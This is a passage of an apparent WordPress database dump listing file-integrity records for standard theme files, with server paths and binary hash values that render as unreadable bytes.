>','wp-content/themes/twentytwentythree/assets/fonts/dm-sans/DMSans-Bold.woff2','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentythree/assets/fonts/dm-sans/DMSans-Bold.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','rN\'~YP%','-b\"CZ)bUk(\Z=','',0,'?'),('fL4\"oSA','wp-content/themes/twentytwentythree/assets/fonts/dm-sans/DMSans-Regular-Italic.woff2','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentythree/assets/fonts/dm-sans/DMSans-Regular-Italic.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*|՗%9','\nw,[Q(ކA߸WM%C{','',0,'?'),('=H{iz˸','',0,'?'),('@d,I օ','wp-content/themes/twentytwentythree/assets/fonts/dm-sans/LICENSE.txt','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentythree/assets/fonts/dm-sans/LICENSE.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' JԵ/Mz\0WCx2{F\"','',0,'?'),(' x-M-Nr','wp-content/themes/twentytwentythree/assets/fonts/ibm-plex-mono/OFL.txt','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentythree/assets/fonts/ibm-plex-mono/OFL.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' -nB ˌ)u','8@9e{Ӎ#ңn\nYփL','',0,'?'),('\'p鱇yw','wp-content/themes/twentytwentythree/assets/fonts/inter/Inter-VariableFont_slnt,wght.ttf','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentythree/assets/fonts/inter/Inter-VariableFont_slnt,wght.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','De,m','%bR447TWz?X6& .','',0,'?'),('{eu I','wp-content/themes/twentytwentythree/assets/fonts/inter/LICENSE.txt','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentythree/assets/fonts/inter/LICENSE.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',\\u`','x`R#GEd[qȟh\nxs','',0,'?'),('%m|F!zS8','wp-content/themes/twentytwentythree/assets/fonts/source-serif-pro/LICENSE.md','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentythree/assets/fonts/source-serif-pro/LICENSE.md',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','UZ)\'a5@','Di\"Ǟt۱R@8uvu','',0,'?'),('B|D','wp-content/themes/twentytwentythree/assets/fonts/source-serif-pro/SourceSerif4Variable-Italic.otf.woff2','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentythree/assets/fonts/source-serif-pro/SourceSerif4Variable-Italic.otf.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W&hE5Ox','1\r*h\\BoB}_XD7','',0,'?'),('vL:J','wp-content/themes/twentytwentythree/assets/fonts/source-serif-pro/SourceSerif4Variable-Italic.ttf.woff2','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentythree/assets/fonts/source-serif-pro/SourceSerif4Variable-Italic.ttf.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@Zɳ|3','_icB7H%K ','',0,'?'),('%CB*rQP','wp-content/themes/twentytwentythree/assets/fonts/source-serif-pro/SourceSerif4Variable-Roman.otf.woff2','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentythree/assets/fonts/source-serif-pro/SourceSerif4Variable-Roman.otf.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' Ay\nYn2!','ShVZt^~͛\n#$֒\r5V','',0,'?'),('K}%XCvx','wp-content/themes/twentytwentythree/assets/fonts/source-serif-pro/SourceSerif4Variable-Roman.ttf.woff2','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentythree/assets/fonts/source-serif-pro/SourceSerif4Variable-Roman.ttf.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7\\\ZEn',' {GS0).~#m}:2','',0,'?'),('Upݽ5lu51','wp-content/themes/twentytwentythree/parts/comments.html','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentythree/parts/comments.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D \'c2G5y','2:`@Aqr\Z\r?,񵟞','',0,'?'),('F8mu@_XT','wp-content/themes/twentytwentythree/parts/footer.html','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentythree/parts/footer.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W o9i [r',' , ׼b$O`I','',0,'?'),(' geΨ2','wp-content/themes/twentytwentythree/parts/header.html','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentythree/parts/header.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R.e˯[KOP','tͲb/un;*9\"Mt','',0,'?'),('ihʖsK','wp-content/themes/twentytwentythree/parts/post-meta.html','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentythree/parts/post-meta.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','83ډ5]&qY','|M\rރBX?q[$}','',0,'?'),('Bx ~ ','wp-content/themes/twentytwentythree/patterns/call-to-action.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentythree/patterns/call-to-action.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B9;llRŀ','pSe8XiH ֯ &.g@F9B}','',0,'?'),('_KNe1H','wp-content/themes/twentytwentythree/patterns/footer-default.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentythree/patterns/footer-default.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|xkG>ޭ','z~x{}9.ж^( e','',0,'?'),('}EOS8ws7H]O','',0,'?'),('\"ڬ<ř6Թs','wp-content/themes/twentytwentythree/patterns/hidden-no-results.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentythree/patterns/hidden-no-results.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C!;C0lzMOe','[BKtH/,_K,N','',0,'?'),('Jw6ԑ `e','wp-content/themes/twentytwentythree/patterns/post-meta.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentythree/patterns/post-meta.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Cq\0v ','MBt=T&p8~&HphSX.tlVS','',0,'?'),('iW;`B<+','wp-content/themes/twentytwentythree/readme.txt','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentythree/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ZY;E.3&J','Md/3’,h4˃Ј|','',0,'?'),('P(^NuI','wp-content/themes/twentytwentythree/screenshot.png','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentythree/screenshot.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/s#y u?','ȳw7_]hI>ʳO','',0,'?'),('St$KYb!Nx\r','wp-content/themes/twentytwentythree/style.css','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentythree/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Nwȫ\'LCPϳ48','\rw\r=b1 [֯\"9','',0,'?'),('k)IaAC<','wp-content/themes/twentytwentythree/styles/aubergine.json','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentythree/styles/aubergine.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}geoʊQp`','Xa)\Z*Gb6\0sQV\\8','',0,'?'),('e\"T{*xļ','wp-content/themes/twentytwentythree/styles/block-out.json','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentythree/styles/block-out.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','VAVsho!H^','{\\*%F|L[~d zUo1u','',0,'?'),('3;\"5$_\\D','wp-content/themes/twentytwentythree/styles/canary.json','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentythree/styles/canary.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','JXP$\'7汹','uAMRkt˰\'@5-','',0,'?'),('ܟ_8H\r$:','wp-content/themes/twentytwentythree/styles/electric.json','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentythree/styles/electric.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ǭ\ndQΩ6_','.zu櫺U Tpɸ-','',0,'?'),('m+:o]au{','wp-content/themes/twentytwentythree/styles/grapes.json','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentythree/styles/grapes.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','팩 ?R,UM( ','Do%\0_;/\")[','',0,'?'),('\"_,yO\\','wp-content/themes/twentytwentythree/styles/marigold.json','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentythree/styles/marigold.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','92Z@Aa','H1~2p^z`ڶ>`PF!NR','',0,'?'),('hR\ZuB ','wp-content/themes/twentytwentythree/styles/pilgrimage.json','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentythree/styles/pilgrimage.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Jz7Λn6{f[l&','\0I%.!4CS[%O{?Q,','',0,'?'),('tc88d@}','wp-content/themes/twentytwentythree/styles/pitch.json','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentythree/styles/pitch.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?l<.8>Yoݩ͒\0','eBHW\'\\ndzF*P','',0,'?'),('+=z58Q ','wp-content/themes/twentytwentythree/styles/sherbet.json','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentythree/styles/sherbet.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K+-@P|O','\n558@Kݘt\'uR zxw','',0,'?'),(' ,֛U\\X1','wp-content/themes/twentytwentythree/styles/whisper.json','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentythree/styles/whisper.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':D„ѴqR','xVMY\ZJ m@*O\':','',0,'?'),('yvtTP5-+`1','wp-content/themes/twentytwentythree/templates/404.html','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentythree/templates/404.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%\"ښ\'&..','by& >#ᎀR\Z]j_','',0,'?'),('`1ܸQ%','wp-content/themes/twentytwentythree/templates/archive.html','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentythree/templates/archive.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dbh ','Oi!GM_QQ<}}E[W_^>','',0,'?'),('S;YdIJW','wp-content/themes/twentytwentythree/templates/blank.html','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentythree/templates/blank.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0xzeF=','\n#FV~0Q%*LFkR','',0,'?'),('>I\'@`kg܂R','wp-content/themes/twentytwentythree/templates/blog-alternative.html','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentythree/templates/blog-alternative.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=\r/Ns','a06b)~=~4vH[ Bf','',0,'?'),('1ty@vG`1\'','wp-content/themes/twentytwentythree/templates/home.html','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentythree/templates/home.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>7ŬE A=DSM','iR1\0ו /O(gF\0','',0,'?'),('P-k\nFJ7+yP','wp-content/themes/twentytwentythree/templates/index.html','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentythree/templates/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$p:zt@',':;T;Dj\03MdւG','',0,'?'),('|ٻ\';l͗','wp-content/themes/twentytwentythree/templates/page.html','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentythree/templates/page.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',s1D  \0','12֠ \"]K9lψ#N:','',0,'?'),('\\ wJ]Բ)','wp-content/themes/twentytwentythree/templates/search.html','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentythree/templates/search.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<Y','~U煴K9Ue¨+8','',0,'?'),('{@Ѫ0Nf','wp-content/themes/twentytwentythree/templates/single.html','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentythree/templates/single.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+g#>J=>u','IfY#}<\\F2X:','',0,'?'),('lŔ7','wp-content/themes/twentytwentythree/theme.json','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentythree/theme.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ؙgȦsHT','U𘥢>Uz\'2W@eQ-','',0,'?'),('-qƣZ0 u','wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Italic.otf.woff2','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Italic.otf.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W&hE5Ox','1\r*h\\BoB}_XD7','',0,'?'),('eġ32W','wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Italic.ttf.woff2','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Italic.ttf.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@Zɳ|3','_icB7H%K ','',0,'?'),('XOz-l9Ʒ0`','wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Roman.otf.woff2','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Roman.otf.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' Ay\nYn2!','ShVZt^~͛\n#$֒\r5V','',0,'?'),('.\n]˯FVR','wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Roman.ttf.woff2','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Roman.ttf.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7\\\ZEn',' {GS0).~#m}:2','',0,'?'),('#*>E%f/','wp-content/themes/twentytwentytwo/assets/fonts/dm-sans/DMSans-Bold.ttf','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/assets/fonts/dm-sans/DMSans-Bold.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z%OaMW','}q{7f4y}pErPCmU\nF','',0,'?'),(')G/ɒxeO5','wp-content/themes/twentytwentytwo/assets/fonts/dm-sans/DMSans-BoldItalic.ttf','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/assets/fonts/dm-sans/DMSans-BoldItalic.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6\0Hqxژ ','y3?}ϑ*50vJ~@','',0,'?'),('ٍ [0J^','wp-content/themes/twentytwentytwo/assets/fonts/dm-sans/DMSans-Italic.ttf','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/assets/fonts/dm-sans/DMSans-Italic.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O/,nޒ}G5+*','Х6/]\Z\\>/Z8/Ԟl:','',0,'?'),('Enjd1','wp-content/themes/twentytwentytwo/assets/fonts/dm-sans/DMSans-Regular.ttf','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/assets/fonts/dm-sans/DMSans-Regular.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yvil27k.','\0{v4+9o&1 G3<*Ca','',0,'?'),('D QfN 4','wp-content/themes/twentytwentytwo/assets/fonts/dm-sans/LICENSE.txt','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/assets/fonts/dm-sans/LICENSE.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' JԵ/Mz8h{g铩@Ye','',0,'?'),('g ?֖1)-','wp-content/themes/twentytwentytwo/assets/fonts/ibm-plex/LICENSE.txt','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/assets/fonts/ibm-plex/LICENSE.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a1! ѵ5I','8@9e{Ӎ#ңn\nYփL','',0,'?'),('ʧT\rdz0\rHoH/','',0,'?'),('젧 zXM$G','wp-content/themes/twentytwentytwo/assets/images/bird-on-salmon.jpg','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/assets/images/bird-on-salmon.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' {9\r','a\"+ʹ\"[:ґA','',0,'?'),('DHN,','wp-content/themes/twentytwentytwo/assets/images/divider-black.png','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/assets/images/divider-black.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8w x m)r','x+RlL\Zk5>vư ND','',0,'?'),('%Ԯ{f ','wp-content/themes/twentytwentytwo/assets/images/divider-white.png','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/assets/images/divider-white.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d(ʷ \rR','@a{aKմrz\r [FV,.>','',0,'?'),(';Q-:@(:85M','wp-content/themes/twentytwentytwo/assets/images/ducks.jpg','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/assets/images/ducks.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',\r:z','8y1^::&s?','',0,'?'),('?gbq\0X4,>','wp-content/themes/twentytwentytwo/assets/images/flight-path-on-gray-a.jpg','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/assets/images/flight-path-on-gray-a.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' [SFcm^(2(}o','88D\Z h;i_w>%-','',0,'?'),('ؓ-','wp-content/themes/twentytwentytwo/assets/images/flight-path-on-gray-b.jpg','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/assets/images/flight-path-on-gray-b.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','TEbB; ','ͽ1=͍N]z]wn@xaH','',0,'?'),('XkЃ','wp-content/themes/twentytwentytwo/assets/images/flight-path-on-gray-c.jpg','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/assets/images/flight-path-on-gray-c.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V-LkV\"}','gq ) @?\ZefZ3a +','',0,'?'),(' ߒgo\0m','wp-content/themes/twentytwentytwo/assets/images/flight-path-on-salmon.jpg','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/assets/images/flight-path-on-salmon.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0ȶ5S','\\a#c`S->Ie\r/N^wk','',0,'?'),('pσjeྵ','wp-content/themes/twentytwentytwo/assets/images/flight-path-on-transparent-a.png','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/assets/images/flight-path-on-transparent-a.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P7vxr?z','h Z\Z\\>{%4F\nԒwˮ','',0,'?'),('S~=}%^','wp-content/themes/twentytwentytwo/assets/images/flight-path-on-transparent-b.png','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/assets/images/flight-path-on-transparent-b.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' 9ȹsăŨX','\'hu͹D\Z\0Tٹ?Q','',0,'?'),('L:/#\"ѯfpڷåY','wp-content/themes/twentytwentytwo/assets/images/flight-path-on-transparent-c.png','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/assets/images/flight-path-on-transparent-c.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2pf{ɡ','.PA\Z|(W@]qnAmp ','',0,'?'),('<#2yQ;w1','wp-content/themes/twentytwentytwo/assets/images/flight-path-on-transparent-d.png','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/assets/images/flight-path-on-transparent-d.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U)j\"Y','bqiHBgebtfy\n@ş','',0,'?'),('SBw{N_>','wp-content/themes/twentytwentytwo/assets/images/icon-binoculars.png','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/assets/images/icon-binoculars.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2=5\'','ԗ&Iپȡ\0 Pa!\\c7','',0,'?'),('<$4 ','wp-content/themes/twentytwentytwo/assets/images/icon-bird.jpg','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/assets/images/icon-bird.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Fy*j+X h','wHxa?S@ߦZWwPwI','',0,'?'),(' ]\rb8','wp-content/themes/twentytwentytwo/assets/videos/birds.mp4','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/assets/videos/birds.mp4',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Pq4/-SUd','r6+,&6VЉG3t:9)T','',0,'?'),('g&S5V\Z&','wp-content/themes/twentytwentytwo/functions.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~/NmCsPC|` ӹL\Z','',0,'?'),('Th^MHVs','wp-content/themes/twentytwentytwo/inc/patterns/footer-navigation-copyright.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/footer-navigation-copyright.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{Bm߱','{ܒѩl\rӰF^F=X95di','',0,'?'),('zd8FM$S[','wp-content/themes/twentytwentytwo/inc/patterns/footer-navigation.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/footer-navigation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%R0FZ\0>&VQ','(d.\"\\nqFw {/:a\"','',0,'?'),(']cuq|z','wp-content/themes/twentytwentytwo/inc/patterns/footer-query-images-title-citation.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/footer-query-images-title-citation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ff-D~)','‰d}\Zb/}[<3hJ','',0,'?'),('rMÄ e','wp-content/themes/twentytwentytwo/inc/patterns/footer-query-title-citation.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/footer-query-title-citation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','((M 53|\r&V','_\n`\Z…(R]jA','',0,'?'),('/Vpk^B\\','wp-content/themes/twentytwentytwo/inc/patterns/footer-social-copyright.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/footer-social-copyright.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':L6iɫHA]','FQQ4Xx&$lHkd','',0,'?'),('/Hnji[v[','wp-content/themes/twentytwentytwo/inc/patterns/footer-title-tagline-social.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/footer-title-tagline-social.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':ff0&L5',' L·NdggQx>pBĺ','',0,'?'),('BFL.ԱB?','wp-content/themes/twentytwentytwo/inc/patterns/general-divider-dark.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/general-divider-dark.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ر\\p3p\'0',' a.{\"cWCz\njRZ#','',0,'?'),('-(_T$*Z','wp-content/themes/twentytwentytwo/inc/patterns/general-divider-light.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/general-divider-light.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U$kY3','=b,N>CMfH˵8ouW','',0,'?'),('@nH Ag','wp-content/themes/twentytwentytwo/inc/patterns/general-featured-posts.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/general-featured-posts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ɠ)c54AD\0','[!u.ꗰ~~C&;','',0,'?'),('ZuRAQ~','wp-content/themes/twentytwentytwo/inc/patterns/general-image-with-caption.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/general-image-with-caption.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z)\r^`vO!\0',' ?\'1E\n9ZxG1\'~8[','',0,'?'),('6T?c[Q6M','wp-content/themes/twentytwentytwo/inc/patterns/general-large-list-names.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/general-large-list-names.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}{YT.ƙ-','p C?ɱ\0Yٗ)۱06','',0,'?'),('/F3`\021W{Y','wp-content/themes/twentytwentytwo/inc/patterns/general-layered-images-with-duotone.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/general-layered-images-with-duotone.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k/:','',0,'?'),('pNe9OiEX)!','wp-content/themes/twentytwentytwo/inc/patterns/general-video-trailer.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/general-video-trailer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','⩑據ysy','@C]^hb6LK','',0,'?'),('7/Dv91j/','wp-content/themes/twentytwentytwo/inc/patterns/general-wide-image-intro-buttons.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/general-wide-image-intro-buttons.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Lwr+lG','V$RYCC(ݞ7:!J5S\rP7','',0,'?'),('i]6Z+\\Nu^','wp-content/themes/twentytwentytwo/inc/patterns/header-centered-logo-black-background.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/header-centered-logo-black-background.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f14X ',' m[KzW`\0m5V+֩,','',0,'?'),('?b>s:|t1#x','wp-content/themes/twentytwentytwo/inc/patterns/header-centered-logo.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/header-centered-logo.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c䏘ZcU','oDGX$)\".AװS t','',0,'?'),('Oa_b,+7tg^','wp-content/themes/twentytwentytwo/inc/patterns/header-centered-title-navigation-social.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/header-centered-title-navigation-social.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v\n:X,|$_;','p 2& (yR:1? ^+^ߤۢR','',0,'?'),('#j-aq`','wp-content/themes/twentytwentytwo/inc/patterns/header-default.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/header-default.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','OS)1WahE','(ѤXW⯁фm|\nQ#GX&','',0,'?'),('}(@}*1,g[','wp-content/themes/twentytwentytwo/inc/patterns/header-image-background-overlay.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/header-image-background-overlay.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','fQ83&7@ጩ;1','\'D%jQS!lt!,A*','',0,'?'),('m;խr1','wp-content/themes/twentytwentytwo/inc/patterns/header-image-background.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/header-image-background.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g{veI 7u@','$N П_40DW-pAZ','',0,'?'),('HvzE\"ZG','wp-content/themes/twentytwentytwo/inc/patterns/header-large-dark.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/header-large-dark.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6P[h|','J\':}-`X\Z$\\','',0,'?'),('40GG?ݑD','wp-content/themes/twentytwentytwo/inc/patterns/header-logo-navigation-gray-background.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/header-logo-navigation-gray-background.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0\n=fHT+b','\' 